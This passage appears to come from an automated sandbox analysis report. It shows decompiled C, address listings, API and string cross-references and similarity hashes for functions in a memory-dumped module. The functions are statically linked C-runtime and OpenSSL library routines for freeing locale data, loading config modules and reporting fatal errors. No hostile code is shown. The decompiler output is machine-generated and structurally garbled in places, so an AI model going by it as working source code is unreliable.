							_t7 = _t74 + 0x88; // 0x89f84758
							E6E54D857( *_t7);
						}
						_t8 = _t74 + 0x7c; // 0x3d077c1f
						E6E541B83( *_t8);
						_t9 = _t74 + 0x88; // 0x89f84758
						E6E541B83( *_t9);
					}
				}
				_t10 = _t74 + 0x8c; // 0xfff78485
				_t26 =  *_t10;
				if(_t26 != 0 &&  *_t26 == 0) {
					_t11 = _t74 + 0x90; // 0xdd183ff
					E6E541B83( *_t11 - 0xfe);
					_t12 = _t74 + 0x94; // 0xf7788d89
					E6E541B83( *_t12 - 0x80);
					_t13 = _t74 + 0x98; // 0x14ebffff
					E6E541B83( *_t13 - 0x80);
					_t14 = _t74 + 0x8c; // 0xfff78485
					E6E541B83( *_t14);
				}
				_t15 = _t74 + 0x9c; // 0xf78485c7
				E6E54B943( *_t15);
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0x6e4f6f6f
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x6e4f6ef7
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e688fa0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E541B83(_t31);
							E6E541B83( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0x8b0011ae
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E541B83(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E541B83(_t74);
			}

0x6e54b7da
0x6e54b7de
0x6e54b7de
0x6e54b7e6
0x6e54b7ef
0x6e54b7ef
0x6e54b7f4
0x6e54b7fb
0x6e54b7fb
0x6e54b803
0x6e54b80b
0x6e54b810
0x6e54b816
0x6e54b81c
0x6e54b81d
0x6e54b81d
0x6e54b825
0x6e54b82d
0x6e54b832
0x6e54b838
0x6e54b83e
0x6e54b83f
0x6e54b842
0x6e54b847
0x6e54b84d
0x6e54b853
0x6e54b7f4
0x6e54b854
0x6e54b854
0x6e54b85c
0x6e54b863
0x6e54b86f
0x6e54b874
0x6e54b882
0x6e54b887
0x6e54b890
0x6e54b895
0x6e54b89b
0x6e54b8a0
0x6e54b8a3
0x6e54b8a9
0x6e54b8b1
0x6e54b8b2
0x6e54b8b2
0x6e54b8b8
0x6e54b8bb
0x6e54b8bb
0x6e54b8be
0x6e54b8c5
0x6e54b8c7
0x6e54b8cb
0x6e54b8d3
0x6e54b8da
0x6e54b8e0
0x6e54b8e1
0x6e54b8e1
0x6e54b8e8
0x6e54b8ea
0x6e54b8ea
0x6e54b8ef
0x6e54b8f7
0x6e54b8fc
0x6e54b8fd
0x6e54b8fd
0x6e54b900
0x6e54b903
0x6e54b906
0x6e54b909
0x6e54b909
0x6e54b919

APIs

___free_lconv_mon.LIBCMT ref: 6E54B816

Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D3C0
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D3D2
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D3E4
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D3F6
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D408
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D41A
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D42C
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D43E
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D450
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D462
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D474
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D486
Part of subcall function 6E54D3A3: _free.LIBCMT ref: 6E54D498

_free.LIBCMT ref: 6E54B80B

Part of subcall function 6E541B83: HeapFree.KERNEL32(00000000,00000000,?,6E54DAF8,6E4F6ECF,00000000,6E4F6ECF,?,?,6E54DD9B,6E4F6ECF,00000007,6E4F6ECF,?,6E54B969,6E4F6ECF), ref: 6E541B99
Part of subcall function 6E541B83: GetLastError.KERNEL32(6E4F6ECF,?,6E54DAF8,6E4F6ECF,00000000,6E4F6ECF,?,?,6E54DD9B,6E4F6ECF,00000007,6E4F6ECF,?,6E54B969,6E4F6ECF,6E4F6ECF), ref: 6E541BAB

_free.LIBCMT ref: 6E54B82D
_free.LIBCMT ref: 6E54B842
_free.LIBCMT ref: 6E54B84D
_free.LIBCMT ref: 6E54B86F
_free.LIBCMT ref: 6E54B882
_free.LIBCMT ref: 6E54B890
_free.LIBCMT ref: 6E54B89B
_free.LIBCMT ref: 6E54B8D3
_free.LIBCMT ref: 6E54B8DA
_free.LIBCMT ref: 6E54B8F7
_free.LIBCMT ref: 6E54B90F

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 3af8a950c08039582148e2eabfed7a520052e3ec00a8fc61870c33353458ef27
Instruction ID: 633c35b39e05afc7b43be218bd2be8128c506f882b8215067c03a5a110946fbd
Opcode Fuzzy Hash: 3af8a950c08039582148e2eabfed7a520052e3ec00a8fc61870c33353458ef27
Instruction Fuzzy Hash: E9316D31604305DFEB90AAB8DA50FAA73E9EF80724F105929E168D7168EF31ED54DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E5605E0, Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 267
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E6E5605E0(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				void* __esi;
				signed int _t46;
				signed int _t50;
				void* _t51;
				signed char _t52;
				signed int _t62;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				void* _t86;
				void* _t87;
				signed int _t89;
				signed int _t92;
				void* _t97;
				signed int _t99;
				void* _t101;
				signed int _t102;
				void* _t105;
				signed int _t106;
				void* _t108;
				signed int _t109;
				signed int _t110;
				void* _t111;
				signed int _t115;
				signed int _t117;
				void* _t118;
				signed int _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				signed int _t124;

				_t97 = __edx;
				_t92 = __ecx;
				E6E52F9A0();
				_t46 =  *0x6e688c24; // 0x8e9367b0
				 *(_t117 + 0x1c) = _t46 ^ _t117;
				_push(__ebx);
				_t89 =  *(_t117 + 0x2c);
				_t113 =  *(_t117 + 0x2c);
				 *(_t117 + 0x20) =  *(_t117 + 0x2c);
				 *(_t117 + 0x1c) =  *(_t117 + 0x2c);
				_t105 = E6E611F50(_t89, 0x2e);
				_t118 = _t117 + 8;
				if(_t105 == 0) {
					_t106 = _t89;
					_t92 = _t106 + 1;
					do {
						_t50 =  *_t106;
						_t106 = _t106 + 1;
						__eflags = _t50;
					} while (_t50 != 0);
					_t107 = _t106 - _t92;
					__eflags = _t106 - _t92;
				} else {
					_t107 = _t105 - _t89;
				}
				_t99 = 0;
				_t51 = E6E55C480( *0x6e68e12c);
				_t119 = _t118 + 4;
				_t52 =  *(_t119 + 0x40);
				if(_t51 <= 0) {
					L10:
					_t130 = _t52 & 0x00000008;
					if((_t52 & 0x00000008) != 0) {
						L19:
						_t133 = _t52 & 0x00000004;
						if((_t52 & 0x00000004) == 0) {
							E6E552F50(_t89, _t92, _t113, _t133, 0xe, 0x76, 0x71, "crypto\\conf\\conf_mod.c", 0xa5);
							_push(_t89);
							_push("module=");
							_push(2);
							_t52 = E6E5525B0();
							_t119 = _t119 + 0x20;
						}
						_pop(_t108);
						return E6E52F227( *(_t119 + 0x1c) ^ _t119, _t108);
					} else {
						 *(_t119 + 0x18) = 0;
						_t109 = E6E59F310(_t89, _t97, _t113, _t130, _t113,  *(_t119 + 0x18), "path");
						_t121 = _t119 + 0xc;
						_t131 = _t109;
						if(_t109 == 0) {
							E6E552700(_t131);
							_t109 = _t89;
						}
						_t101 = E6E59F6B0(_t92, _t113, 0, _t109, 0, 0);
						_t122 = _t121 + 0x10;
						_t132 = _t101;
						if(_t101 != 0) {
							_t115 = E6E59F420(_t101, "OPENSSL_init");
							_t123 = _t122 + 8;
							__eflags = _t115;
							if(_t115 != 0) {
								_t113 = E6E560500(_t89, _t92, _t115, _t101, _t89, _t115, E6E59F420(_t101, "OPENSSL_finish"));
								_t123 = _t123 + 0x18;
								__eflags = _t113;
								if(_t113 != 0) {
									goto L22;
								} else {
									goto L18;
								}
							} else {
								 *((intOrPtr*)(_t123 + 0x10)) = 0x70;
								goto L18;
							}
						} else {
							 *((intOrPtr*)(_t122 + 0x10)) = 0x6e;
							L18:
							E6E59F5E0(_t89, _t92, _t113, _t101);
							E6E552F50(_t89, _t92, _t113, _t132, 0xe, 0x75,  *(_t123 + 0x1c), "crypto\\conf\\conf_mod.c", 0xe0);
							_push(_t109);
							_push(", path=");
							_push(_t89);
							_push("module=");
							_push(4);
							E6E5525B0();
							_t52 =  *(_t123 + 0x6c);
							_t119 = _t123 + 0x2c;
							goto L19;
						}
					}
				} else {
					while(1) {
						_t113 = E6E55C640( *0x6e68e12c, _t99);
						_t86 = E6E537D20( *((intOrPtr*)(_t113 + 4)), _t89, _t107);
						_t123 = _t119 + 0x14;
						if(_t86 == 0) {
							break;
						}
						_t99 = _t99 + 1;
						_t87 = E6E55C480( *0x6e68e12c);
						_t119 = _t123 + 4;
						if(_t99 < _t87) {
							continue;
						} else {
							_t52 =  *(_t119 + 0x40);
							_t113 =  *(_t119 + 0x18);
							goto L10;
						}
						goto L45;
					}
					L22:
					_push(0x12a);
					_push("crypto\\conf\\conf_mod.c");
					_t102 = 1;
					 *(_t123 + 0x1c) = 0;
					_t110 = E6E55C790(0x14);
					_t124 = _t123 + 0xc;
					__eflags = _t110;
					if(_t110 == 0) {
						_t92 = 0;
						__eflags = 0;
						goto L36;
					} else {
						 *_t110 = _t113;
						 *(_t110 + 4) = E6E561200(_t89, "crypto\\conf\\conf_mod.c", 0x12f);
						_t75 = E6E561200( *((intOrPtr*)(_t124 + 0x28)), "crypto\\conf\\conf_mod.c", 0x130);
						_t124 = _t124 + 0x18;
						 *(_t110 + 8) = _t75;
						__eflags =  *(_t110 + 4);
						 *(_t110 + 0x10) = 0;
						if( *(_t110 + 4) == 0) {
							L40:
							_push(0x158);
							_push("crypto\\conf\\conf_mod.c");
							E6E55C7C0( *(_t110 + 4));
							_push(0x159);
							_push("crypto\\conf\\conf_mod.c");
							E6E55C7C0( *(_t110 + 8));
							_push(0x15a);
							_push("crypto\\conf\\conf_mod.c");
							E6E55C7C0(_t110);
							_t124 = _t124 + 0x24;
							goto L41;
						} else {
							__eflags = _t75;
							if(_t75 == 0) {
								goto L40;
							} else {
								_t76 =  *(_t113 + 8);
								__eflags = _t76;
								if(_t76 == 0) {
									L27:
									_t77 =  *0x6e68e130;
									__eflags = _t77;
									if(_t77 != 0) {
										L31:
										_t78 = E6E55C510(_t77, _t110);
										_t124 = _t124 + 8;
										__eflags = _t78;
										if(__eflags != 0) {
											 *((intOrPtr*)(_t113 + 0x10)) =  *((intOrPtr*)(_t113 + 0x10)) + 1;
											__eflags = _t102;
											if(_t102 == 0) {
												goto L42;
											}
										} else {
											_push(0x148);
											goto L30;
										}
									} else {
										_t77 = E6E55C3E0();
										 *0x6e68e130 = _t77;
										__eflags = _t77;
										if(__eflags != 0) {
											goto L31;
										} else {
											_push(0x142);
											L30:
											_push("crypto\\conf\\conf_mod.c");
											_push(0x41);
											_push(0x73);
											_push(0xe);
											E6E552F50(_t89, _t92, _t113, __eflags);
											_t92 =  *(_t124 + 0x24);
											_t124 = _t124 + 0x14;
											goto L36;
										}
									}
								} else {
									_t102 =  *_t76(_t110,  *(_t124 + 0x18));
									_t124 = _t124 + 8;
									_t92 = 1;
									 *(_t124 + 0x10) = 1;
									__eflags = _t102;
									if(_t102 <= 0) {
										L36:
										_t62 =  *(_t113 + 0xc);
										__eflags = _t62;
										if(_t62 != 0) {
											__eflags = _t92;
											if(_t92 != 0) {
												 *_t62(_t110);
												_t124 = _t124 + 4;
											}
										}
										__eflags = _t110;
										if(_t110 != 0) {
											goto L40;
										}
										L41:
										_t102 = _t102 | 0xffffffff;
										__eflags = _t102;
										L42:
										__eflags =  *(_t124 + 0x40) & 0x00000004;
										if(__eflags == 0) {
											E6E552F50(_t89, _t92, _t113, __eflags, 0xe, 0x76, 0x6d, "crypto\\conf\\conf_mod.c", 0xb1);
											_push(_t102);
											_push("%-8d");
											_push(0xd);
											_push(_t124 + 0x38);
											E6E55CB70(__eflags);
											_push(_t124 + 0x40);
											_push(", retcode=");
											_push( *(_t124 + 0x40));
											_push(", value=");
											_push(_t89);
											_push("module=");
											_push(6);
											E6E5525B0();
											_t124 = _t124 + 0x40;
										}
									} else {
										goto L27;
									}
								}
							}
						}
					}
					_pop(_t111);
					__eflags =  *(_t124 + 0x2c) ^ _t124;
					return E6E52F227( *(_t124 + 0x2c) ^ _t124, _t111);
				}
				L45:
			}

0x6e5605e0
0x6e5605e0
0x6e5605e5
0x6e5605ea
0x6e5605f1
0x6e5605f9
0x6e5605fa
0x6e5605ff
0x6e560608
0x6e56060c
0x6e560615
0x6e560617
0x6e56061c
0x6e560622
0x6e560624
0x6e560627
0x6e560627
0x6e560629
0x6e56062a
0x6e56062a
0x6e56062e
0x6e56062e
0x6e56061e
0x6e56061e
0x6e56061e
0x6e560636
0x6e560638
0x6e56063d
0x6e560642
0x6e560646
0x6e56068e
0x6e56068e
0x6e560690
0x6e56074e
0x6e56074e
0x6e560750
0x6e560762
0x6e560767
0x6e560768
0x6e56076d
0x6e56076f
0x6e560774
0x6e560774
0x6e560778
0x6e56078c
0x6e560696
0x6e56069f
0x6e5606ad
0x6e5606af
0x6e5606b2
0x6e5606b4
0x6e5606b6
0x6e5606bb
0x6e5606bb
0x6e5606c9
0x6e5606cb
0x6e5606ce
0x6e5606d0
0x6e5606e7
0x6e5606e9
0x6e5606ec
0x6e5606ee
0x6e56070e
0x6e560710
0x6e560713
0x6e560715
0x00000000
0x00000000
0x00000000
0x00000000
0x6e5606f0
0x6e5606f0
0x00000000
0x6e5606f0
0x6e5606d2
0x6e5606d2
0x6e560717
0x6e560718
0x6e56072f
0x6e560734
0x6e560735
0x6e56073a
0x6e56073b
0x6e560740
0x6e560742
0x6e560747
0x6e56074b
0x00000000
0x6e56074b
0x6e5606d0
0x6e560650
0x6e560650
0x6e56065c
0x6e560663
0x6e560668
0x6e56066d
0x00000000
0x00000000
0x6e560679
0x6e56067a
0x6e56067f
0x6e560684
0x00000000
0x6e560686
0x6e560686
0x6e56068a
0x00000000
0x6e56068a
0x00000000
0x6e560684
0x6e56078d
0x6e56078d
0x6e560792
0x6e560799
0x6e56079e
0x6e5607ab
0x6e5607ad
0x6e5607b0
0x6e5607b2
0x6e560876
0x6e560876
0x00000000
0x6e5607b8
0x6e5607c3
0x6e5607d8
0x6e5607db
0x6e5607e0
0x6e5607e3
0x6e5607e6
0x6e5607ea
0x6e5607f1
0x6e56088d
0x6e56088d
0x6e560892
0x6e56089a
0x6e56089f
0x6e5608a4
0x6e5608ac
0x6e5608b1
0x6e5608b6
0x6e5608bc
0x6e5608c1
0x00000000
0x6e5607f7
0x6e5607f7
0x6e5607f9
0x00000000
0x6e5607ff
0x6e5607ff
0x6e560802
0x6e560804
0x6e56081f
0x6e56081f
0x6e560824
0x6e560826
0x6e560854
0x6e560856
0x6e56085b
0x6e56085e
0x6e560860
0x6e560869
0x6e56086c
0x6e56086e
0x00000000
0x6e560874
0x6e560862
0x6e560862
0x00000000
0x6e560862
0x6e560828
0x6e560828
0x6e56082d
0x6e560832
0x6e560834
0x00000000
0x6e560836
0x6e560836
0x6e56083b
0x6e56083b
0x6e560840
0x6e560842
0x6e560844
0x6e560846
0x6e56084b
0x6e56084f
0x00000000
0x6e56084f
0x6e560834
0x6e560806
0x6e56080d
0x6e56080f
0x6e560812
0x6e560817
0x6e56081b
0x6e56081d
0x6e560878
0x6e560878
0x6e56087b
0x6e56087d
0x6e56087f
0x6e560881
0x6e560884
0x6e560886
0x6e560886
0x6e560881
0x6e560889
0x6e56088b
0x00000000
0x00000000
0x6e5608c4
0x6e5608c4
0x6e5608c4
0x6e5608c7
0x6e5608c7
0x6e5608cc
0x6e5608de
0x6e5608e3
0x6e5608e4
0x6e5608ed
0x6e5608ef
0x6e5608f0
0x6e5608f9
0x6e5608fa
0x6e5608ff
0x6e560903
0x6e560908
0x6e560909
0x6e56090e
0x6e560910
0x6e560915
0x6e560915
0x00000000
0x00000000
0x00000000
0x6e56081d
0x6e560804
0x6e5607f9
0x6e5607f1
0x6e56091f
0x6e560922
0x6e56092c
0x6e56092c
0x00000000

APIs

_strrchr.LIBCMT ref: 6E560610

Strings

, retcode=, xrefs: 6E5608FA
p, xrefs: 6E5606F0
crypto\conf\conf_mod.c, xrefs: 6E560722, 6E560757, 6E560792, 6E5607BD, 6E5607CF, 6E56083B, 6E560892, 6E5608A4, 6E5608B6, 6E5608D3
module=, xrefs: 6E56073B, 6E560768, 6E560909
%-8d, xrefs: 6E5608E4
OPENSSL_init, xrefs: 6E5606DC
OPENSSL_finish, xrefs: 6E5606FA
path, xrefs: 6E560696
, path=, xrefs: 6E560735
, value=, xrefs: 6E560903

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID: %-8d$, path=$, retcode=$, value=$OPENSSL_finish$OPENSSL_init$crypto\conf\conf_mod.c$module=$p$path
API String ID: 3213747228-120364777
Opcode ID: d9da1a2561ba4a89bee65366478ccc09525de9b278b03ac0cfa69f177e37721a
Instruction ID: 86aa340f0382aed9632d26bb7ba6caadbb3c7830ed08c51ce3d4d5ee049c89ae
Opcode Fuzzy Hash: d9da1a2561ba4a89bee65366478ccc09525de9b278b03ac0cfa69f177e37721a
Instruction Fuzzy Hash: 10812731644301BBE3208FE58C42FAB37E89F85758F044C2EFA586E391F7A5D95186A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E5812D0, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 206
registryfileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E5812D0(void* __ebx, void* __edi, char* _a4, char _a8) {
				signed int _v8;
				short _v10;
				void _v520;
				long _v524;
				void* _v536;
				void* __esi;
				signed int _t46;
				int _t49;
				int _t51;
				int _t57;
				void* _t67;
				int _t72;
				void* _t79;
				short* _t84;
				void* _t86;
				short* _t92;
				signed int _t93;
				signed int _t95;
				signed int _t99;
				char* _t100;
				short* _t101;
				int _t103;
				void* _t106;
				intOrPtr* _t107;
				signed int _t108;
				void* _t109;
				void* _t110;
				signed int _t113;
				signed int _t114;
				short* _t115;

				E6E52F9A0();
				_t46 =  *0x6e688c24; // 0x8e9367b0
				_v8 = _t46 ^ _t114;
				_push(__edi);
				_t106 = GetStdHandle(0xfffffff4);
				if(_t106 == 0 || GetFileType(_t106) == 0) {
					_t107 = _a4;
					_t86 = _t107 + 1;
					do {
						_t49 =  *_t107;
						_t107 = _t107 + 1;
						__eflags = _t49;
					} while (_t49 != 0);
					_t108 = _t107 - _t86;
					_t103 = _t108 + 1;
					E6E530020();
					_t84 = _t115;
					__eflags = _t84;
					if(_t84 != 0) {
						_t51 = MultiByteToWideChar(0, 0, _a4, _t103, _t84, _t103);
						__eflags = _t51;
						if(_t51 != 0) {
							__eflags = _t103;
							if(_t103 == 0) {
								L31:
								E6E537846( *(E6E4F8FA0()) | 0x00000001,  *((intOrPtr*)(_t54 + 4)),  &_v520, 0xff, _t84, 0,  &_a8);
								_v10 = 0;
								_t57 = E6E5811B0(_t103);
								__eflags = _t57;
								if(_t57 <= 0) {
									MessageBoxW(0,  &_v520, L"OpenSSL: FATAL", 0x10);
								} else {
									_t110 = RegisterEventSourceW(0, L"OpenSSL");
									__eflags = _t110;
									if(_t110 != 0) {
										_v524 =  &_v520;
										ReportEventW(_t110, 1, 0, 0, 0, 1, 0,  &_v524, 0);
										DeregisterEventSource(_t110);
									}
								}
								goto L35;
							}
							L19:
							_t99 = 0;
							asm("o16 nop [eax+eax]");
							do {
								__eflags = _t84[_t99] - 0x25;
								if(_t84[_t99] != 0x25) {
									goto L30;
								}
								_t29 = _t99 + 1; // 0x1
								_t92 =  &(_t84[_t29]);
								while(1) {
									L22:
									_t67 = ( *_t92 & 0x0000ffff) + 0xffffffd6;
									__eflags = _t67 - 0x49;
									if(_t67 > 0x49) {
										goto L30;
									}
									_t32 = _t67 + 0x6e581560; // 0x43b80c
									switch( *((intOrPtr*)(( *_t32 & 0x000000ff) * 4 +  &M6E581548))) {
										case 0:
											_t99 = _t99 + 1;
											_t92 =  &(_t92[1]);
											goto L22;
										case 1:
											goto L29;
										case 2:
											goto L29;
										case 3:
											L29:
											 *__ecx = __ax;
											goto L30;
										case 4:
											 *__ecx = __si;
											goto L30;
										case 5:
											goto L30;
									}
								}
								L30:
								_t99 = _t99 + 1;
								__eflags = _t99 - _t103;
							} while (_t99 < _t103);
							goto L31;
						}
						_t93 = 0;
						__eflags = _t103;
						if(_t103 == 0) {
							goto L31;
						}
						__eflags = _t103 - 0x20;
						if(_t103 < 0x20) {
							L16:
							_t100 = _a4;
							L17:
							_t84[_t93] =  *((char*)(_t93 + _t100));
							_t93 = _t93 + 1;
							__eflags = _t93 - _t103;
							L15:
							if(__eflags >= 0) {
								goto L19;
							}
							goto L16;
						}
						_t100 = _a4;
						__eflags = _t84 - _t108 + _t100;
						if(_t84 > _t108 + _t100) {
							L12:
							_t101 =  &(_t84[0x10]);
							_t113 = _t103 & 0xffffffe0;
							_t72 =  &(_a4[0x10]);
							__eflags = _t72;
							do {
								asm("movq xmm0, [eax-0x10]");
								_t101 =  &(_t101[0x20]);
								asm("punpcklbw xmm0, xmm0");
								_t72 = _t72 + 0x20;
								asm("psraw xmm0, 0x8");
								_t93 = _t93 + 0x20;
								asm("movups [edx-0x60], xmm0");
								asm("movq xmm0, [eax-0x28]");
								asm("punpcklbw xmm0, xmm0");
								asm("psraw xmm0, 0x8");
								asm("movups [edx-0x50], xmm0");
								asm("movq xmm0, [eax-0x20]");
								asm("punpcklbw xmm0, xmm0");
								asm("psraw xmm0, 0x8");
								asm("movups [edx-0x40], xmm0");
								asm("movq xmm0, [eax-0x18]");
								asm("punpcklbw xmm0, xmm0");
								asm("psraw xmm0, 0x8");
								asm("movups [edx-0x30], xmm0");
								__eflags = _t93 - _t113;
							} while (_t93 < _t113);
							_v524 = _t93;
							__eflags = _t93 - _t103;
							goto L15;
						}
						__eflags =  &(_t84[_t108]) - _t100;
						if( &(_t84[_t108]) >= _t100) {
							goto L17;
						}
						goto L12;
					}
					_t84 = L"no stack?";
					goto L31;
				} else {
					_t95 =  *(E6E4F8FA0()) | 0x00000001;
					_t79 =  <  ? _t95 | 0xffffffff : E6E537822(_t95,  *((intOrPtr*)(_t77 + 4)),  &_v520, 0x200, _a4, 0,  &_a8);
					_t80 =  <  ? 0x200 : _t79;
					WriteFile(_t106,  &_v520,  <  ? 0x200 : _t79,  &_v524, 0);
					L35:
					_pop(_t109);
					return E6E52F227(_v8 ^ _t114, _t109);
				}
			}

0x6e5812d8
0x6e5812dd
0x6e5812e4
0x6e5812e9
0x6e5812f2
0x6e5812f6
0x6e58135d
0x6e581360
0x6e581363
0x6e581363
0x6e581365
0x6e581366
0x6e581366
0x6e58136a
0x6e58136c
0x6e581372
0x6e581377
0x6e581379
0x6e58137b
0x6e581391
0x6e581397
0x6e581399
0x6e581441
0x6e581443
0x6e58149f
0x6e5814c0
0x6e5814ca
0x6e5814ce
0x6e5814d3
0x6e5814d5
0x6e58152b
0x6e5814d7
0x6e5814e4
0x6e5814e6
0x6e5814e8
0x6e5814f2
0x6e58150c
0x6e581513
0x6e581513
0x6e5814e8
0x00000000
0x6e5814d5
0x6e581445
0x6e581445
0x6e58144a
0x6e581450
0x6e581450
0x6e581455
0x00000000
0x00000000
0x6e581457
0x6e58145a
0x6e581460
0x6e581460
0x6e581463
0x6e581466
0x6e581469
0x00000000
0x00000000
0x6e58146b
0x6e581472
0x00000000
0x6e581479
0x6e58147a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e581497
0x6e581497
0x00000000
0x00000000
0x6e58147f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e581472
0x6e58149a
0x6e58149a
0x6e58149b
0x6e58149b
0x00000000
0x6e581450
0x6e58139f
0x6e5813a1
0x6e5813a3
0x00000000
0x00000000
0x6e5813a9
0x6e5813ac
0x6e581430
0x6e581430
0x6e581433
0x6e581438
0x6e58143c
0x6e58143d
0x6e58142e
0x6e58142e
0x00000000
0x00000000
0x00000000
0x6e58142e
0x6e5813b2
0x6e5813b8
0x6e5813ba
0x6e5813c3
0x6e5813c6
0x6e5813cb
0x6e5813ce
0x6e5813ce
0x6e5813d1
0x6e5813d1
0x6e5813d6
0x6e5813d9
0x6e5813dd
0x6e5813e0
0x6e5813e5
0x6e5813e8
0x6e5813ec
0x6e5813f1
0x6e5813f5
0x6e5813fa
0x6e5813fe
0x6e581403
0x6e581407
0x6e58140c
0x6e581410
0x6e581415
0x6e581419
0x6e58141e
0x6e581422
0x6e581422
0x6e581426
0x6e58142c
0x00000000
0x6e58142c
0x6e5813bf
0x6e5813c1
0x00000000
0x00000000
0x00000000
0x6e5813c1
0x6e58137d
0x00000000
0x6e581303
0x6e581322
0x6e581333
0x6e581346
0x6e581352
0x6e581531
0x6e581538
0x6e581547
0x6e581547

APIs

GetStdHandle.KERNEL32(000000F4,00000000,?,00000000,00000000,6E581196,%s:%d: OpenSSL internal error: %s,6E5BC281,6E5BC281,?,6E563D72,assertion failed: ctx->digest->md_size <= EVP_MAX_MD_SIZE,crypto\evp\digest.c,000000AD,00000000,?), ref: 6E5812EC
GetFileType.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 6E5812F9
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 6E581352
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6E581391
RegisterEventSourceW.ADVAPI32(00000000,OpenSSL), ref: 6E5814DE
ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 6E58150C
DeregisterEventSource.ADVAPI32(00000000), ref: 6E581513

Strings

OpenSSL: FATAL, xrefs: 6E58151D
no stack?, xrefs: 6E58137D
OpenSSL, xrefs: 6E5814D7

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
String ID: OpenSSL$OpenSSL: FATAL$no stack?
API String ID: 1270133462-278800372
Opcode ID: 83856f52606162ad7398fae51770c5d33e2ab8bb56afe994e98f7d093fdd352d
Instruction ID: 665e2ae9ddd2327b1ceb1060c54291052dac56278c5a7ad264fb0ac41d9c6ecf
Opcode Fuzzy Hash: 83856f52606162ad7398fae51770c5d33e2ab8bb56afe994e98f7d093fdd352d
Instruction Fuzzy Hash: 40714D31910626DBDB118FA4CD90FEF77B8EF46704F104299F925AB5A1FB70DA848B50

Uniqueness

Uniqueness Score: -1.00%

Function 6E54D4A1, Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E54D4A1(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
